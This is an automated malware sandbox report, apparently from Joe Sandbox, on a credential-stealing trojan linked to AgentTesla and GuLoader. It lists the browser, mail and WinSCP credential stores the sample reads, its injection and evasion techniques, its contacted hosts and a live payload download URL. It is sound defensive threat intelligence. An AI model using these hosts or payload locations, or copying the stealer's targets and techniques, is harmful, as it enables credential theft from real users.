            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_00405B9C GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B9C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7456, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7456, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7456, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            4
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            1
            Registry Run Keys / Startup Folder
            111
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            36
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter
            Logon Script (Windows)1
            Registry Run Keys / Startup Folder
            1
            Obfuscated Files or Information
            1
            Credentials in Registry
            521
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model11
            Input Capture
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets251
            Virtualization/Sandbox Evasion
            SSH2
            Clipboard Data
            23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1420850 Sample: hnTW5HdWvY.exe Startdate: 05/04/2024 Architecture: WINDOWS Score: 100 36 mail.legodimo.co.za 2->36 38 lifeartfertility.co.za 2->38 40 3 other IPs or domains 2->40 50 Found malware configuration 2->50 52 Antivirus detection for URL or domain 2->52 54 Antivirus detection for dropped file 2->54 56 10 other signatures 2->56 8 hnTW5HdWvY.exe 12 62 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 26 C:\Users\user\AppData\...\Bundforskelligt.For, ASCII 8->26 dropped 58 Suspicious powershell command line found 8->58 12 powershell.exe 20 8->12         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\hnTW5HdWvY.exe, PE32 12->28 dropped 60 Obfuscated command line found 12->60 62 Writes to foreign memory regions 12->62 64 Powershell drops PE file 12->64 16 wab.exe 15 8 12->16         started        20 conhost.exe 12->20         started        22 cmd.exe 1 12->22         started        signatures9 process10 dnsIp11 30 ip-api.com 208.95.112.1, 49738, 80 TUT-ASUS United States 16->30 32 lifeartfertility.co.za 102.67.137.82, 443, 49736 DataKeepersZA South Africa 16->32 34 2 other IPs or domains 16->34 42 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->42 44 Tries to steal Mail credentials (via file / registry access) 16->44 46 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->46 48 2 other signatures 16->48 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            hnTW5HdWvY.exe50%ReversingLabsWin32.Trojan.Generic
            hnTW5HdWvY.exe50%VirustotalBrowse
            hnTW5HdWvY.exe100%AviraHEUR/AGEN.1338492
            hnTW5HdWvY.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe100%AviraHEUR/AGEN.1338492
            C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll0%VirustotalBrowse
            C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe50%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe60%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://crl.micro0%URL Reputationsafe
            http://crl.micro0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            lifeartfertility.co.za
            102.67.137.82
            truefalse
              high
              legodimo.co.za
              41.76.215.87
              truefalse
                high
                api.ipify.org
                104.26.12.205
                truefalse
                  high
                  ip-api.com
                  208.95.112.1
                  truefalse
                    high
                    mail.legodimo.co.za
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        high
                        https://lifeartfertility.co.za/dKatzZJXqh143.binfalse
                          high
                          http://ip-api.com/line/?fields=hostingfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://api.ipify.orgwab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://nsis.sf.net/NSIS_ErrorhnTW5HdWvY.exe, hnTW5HdWvY.exe.1.drfalse
                                  high
                                  http://crl.micropowershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  • URL Reputation: malware
                                  unknown
                                  http://mail.legodimo.co.zawab.exe, 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.00000000205E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.0000000007210000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://ip-api.comwab.exe, 00000005.00000002.2869316085.0000000020591000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://lifeartfertility.co.za/wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://lifeartfertility.co.za/dKatzZJXqh143.bindwab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://nsis.sf.net/NSIS_ErrorErrorhnTW5HdWvY.exe, hnTW5HdWvY.exe.1.drfalse
                                                high
                                                https://api.ipify.org/twab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://legodimo.co.zawab.exe, 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.00000000205E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2011308617.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/pscore6lBqqpowershell.exe, 00000001.00000002.2011308617.0000000004A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.0000000007210000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://lifeartfertility.co.za/owab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            102.67.137.82
                                                            lifeartfertility.co.zaSouth Africa
                                                            328170DataKeepersZAfalse
                                                            208.95.112.1
                                                            ip-api.comUnited States
                                                            53334TUT-ASUSfalse
                                                            104.26.12.205
                                                            api.ipify.orgUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            41.76.215.87
                                                            legodimo.co.zaSouth Africa
                                                            37611AfrihostZAfalse
                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1420850
                                                            Start date and time:2024-04-05 14:28:09 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 37s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:9
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:hnTW5HdWvY.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:6827f81b3add0570684d911484c7c3a75f4d565123261d4173306ab35e998494.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@8/20@6/4
                                                            EGA Information:
                                                            • Successful, ratio: 66.7%
                                                            HCA Information:
                                                            • Successful, ratio: 95%
                                                            • Number of executed functions: 197
                                                            • Number of non-executed functions: 47
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 4320 because it is empty
                                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            TimeTypeDescription
                                                            14:28:57API Interceptor41x Sleep call for process: powershell.exe modified
                                                            14:29:34API Interceptor183929x Sleep call for process: wab.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            102.67.137.82kdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                POP3.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  CtB0cM3RQI.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                    PO03132024.scr.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      rPurchaseorder03112024.scr.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        208.95.112.1kdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        2024-APR salary payroll confirm .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        SecuriteInfo.com.Win32.PWSX-gen.21084.5000.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        Azizi Riviera Azure works.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.2006.1539.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        xxYQSnZJL6Yb.exeGet hashmaliciousQuasarBrowse
                                                                        • ip-api.com/json/
                                                                        POP3.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        FH4GDGD.exeGet hashmaliciousBlank GrabberBrowse
                                                                        • ip-api.com/json/?fields=225545
                                                                        104.26.12.205Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                                        • api.ipify.org/?format=json
                                                                        SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                                                        • api.ipify.org/
                                                                        lods.cmdGet hashmaliciousRemcosBrowse
                                                                        • api.ipify.org/
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        lifeartfertility.co.zakdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        CtB0cM3RQI.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        ip-api.comkdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 208.95.112.1
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 208.95.112.1
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        2024-APR salary payroll confirm .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 208.95.112.1
                                                                        SecuriteInfo.com.Win32.PWSX-gen.21084.5000.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 208.95.112.1
                                                                        Azizi Riviera Azure works.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.2006.1539.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        xxYQSnZJL6Yb.exeGet hashmaliciousQuasarBrowse
                                                                        • 208.95.112.1
                                                                        Pay Off- Statement.msgGet hashmaliciousHTMLPhisherBrowse
                                                                        • 38.91.107.240
                                                                        POP3.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 208.95.112.1
                                                                        api.ipify.orgK27QM69Lbj.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                        • 104.26.13.205
                                                                        kdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 104.26.12.205
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.74.152
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.20577.9045.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        MK_Order_200387_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        http://celsia.ioGet hashmaliciousHTMLPhisherBrowse
                                                                        • 172.67.74.152
                                                                        2024-APR salary payroll confirm .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.74.152
                                                                        SecuriteInfo.com.Win32.PWSX-gen.21084.5000.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.26.12.205
                                                                        Azizi Riviera Azure works.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSCDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                        • 162.159.133.233
                                                                        K27QM69Lbj.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                        • 104.26.13.205
                                                                        https://share-eu1.hsforms.com/1P_6IFHnbRriC_DG56YzVhw2dz72lGet hashmaliciousHTMLPhisherBrowse
                                                                        • 172.65.238.60
                                                                        kdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 104.26.12.205
                                                                        1wo0hZ6xkZ.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.25.151
                                                                        https://minw90432832932ewew.filesdocservicehandler.top/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 1.1.1.1
                                                                        https://tsgagency-my.sharepoint.com/:b:/g/personal/jeff_tsg-agency_com/Eda7F7tlWMVFmAmYZtATPDEB5Oy9EM8J_JXykM348pH-LA?e=Op3WcSGet hashmaliciousHTMLPhisherBrowse
                                                                        • 172.67.189.252
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.74.152
                                                                        DeepLSetup.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.65.225.25
                                                                        DeepLSetup.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.65.225.25
                                                                        AfrihostZAkdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 41.76.215.87
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 41.76.215.87
                                                                        lUJIhHyHmC.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 169.23.222.2
                                                                        QlEroARpo3.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 169.194.182.122
                                                                        Y31ikuyDAd.elfGet hashmaliciousMiraiBrowse
                                                                        • 169.69.236.233
                                                                        0QDPnpn9tH.elfGet hashmaliciousMiraiBrowse
                                                                        • 169.160.55.93
                                                                        35YUJoJHtk.elfGet hashmaliciousMiraiBrowse
                                                                        • 169.167.203.163
                                                                        kqdoQHdDvZ.elfGet hashmaliciousMiraiBrowse
                                                                        • 169.99.95.129
                                                                        CtB0cM3RQI.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 41.76.215.87
                                                                        uTqhN6wE4e.elfGet hashmaliciousMirai, GafgytBrowse
                                                                        • 169.37.91.27
                                                                        TUT-ASUSkdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 208.95.112.1
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 208.95.112.1
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        2024-APR salary payroll confirm .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 208.95.112.1
                                                                        SecuriteInfo.com.Win32.PWSX-gen.21084.5000.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 208.95.112.1
                                                                        Azizi Riviera Azure works.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.2006.1539.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        xxYQSnZJL6Yb.exeGet hashmaliciousQuasarBrowse
                                                                        • 208.95.112.1
                                                                        POP3.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 208.95.112.1
                                                                        FH4GDGD.exeGet hashmaliciousBlank GrabberBrowse
                                                                        • 208.95.112.1
                                                                        DataKeepersZAkdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        https://trk.klclick.com/ls/click?upn=u001.Q-2FRM-2Bs26jJfGw5AtNrGvPElR21Fg91L95yj4Iz7-2B9G-2B3KPT4UTHFBvpJSSQd5DbUCa-2FgT20Nr-2FI-2Fl-2Bw02Q5kQVLNQCmEXSYzNqG4I9-2FWzMU-3D_yf-_EMv3ibMoStDGptK1Lms5B9GNcIxUJoI7nZBoidcaOggmj5FAjQl0qnOmLtI1x1Ohc-2BFRm3llFgfvw4mcvsY2XyBfnm98SHSdVCZ86-2BuKsLC9TiMREXmWLtb9XN85omSoULbzgNKo8btbmPCJnm6DuzybU2cyp-2BAjh-2BCBHcGcZ-2BljQXaxBUINeSHu-2Bxv5rrih-2FiSTOEtfcLo-2FbwjHZ3ZafNJBrTlWjJSftzVp-2FcV-2BioF1z5UMgToiIzYHW-2Br37XcJ57c-2FuTma8IFo-2B3lZn3cS-2BLKyyRV321xRUJLTBYZ63nI5Z9Ta0wRgXvdEvqv1OsFXGet hashmaliciousUnknownBrowse
                                                                        • 102.67.141.247
                                                                        POP3.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        CtB0cM3RQI.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        PO03132024.scr.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        rPurchaseorder03112024.scr.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        CLA Screensaver - Setup - v8.23.0202 - (Eanex Africa).msiGet hashmaliciousUnknownBrowse
                                                                        • 102.22.83.117
                                                                        Nov2022 Bill-Charge.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 160.119.100.32
                                                                        Nov2022_Bill-Charge.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 160.119.100.32
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0eK27QM69Lbj.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                        • 104.26.12.205
                                                                        update.jsGet hashmaliciousNetSupport RATBrowse
                                                                        • 104.26.12.205
                                                                        kdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 104.26.12.205
                                                                        1wo0hZ6xkZ.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.26.12.205
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 104.26.12.205
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.12.205
                                                                        receipt.vbsGet hashmaliciousXWormBrowse
                                                                        • 104.26.12.205
                                                                        DOC692-692692.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                        • 104.26.12.205
                                                                        DOC5723-57235723.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                        • 104.26.12.205
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.20577.9045.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.12.205
                                                                        37f463bf4616ecd445d4a1937da06e19CDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                        • 102.67.137.82
                                                                        kdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 102.67.137.82
                                                                        PRm6reI7bQ.exeGet hashmaliciousDarkCloudBrowse
                                                                        • 102.67.137.82
                                                                        receipt.vbsGet hashmaliciousXWormBrowse
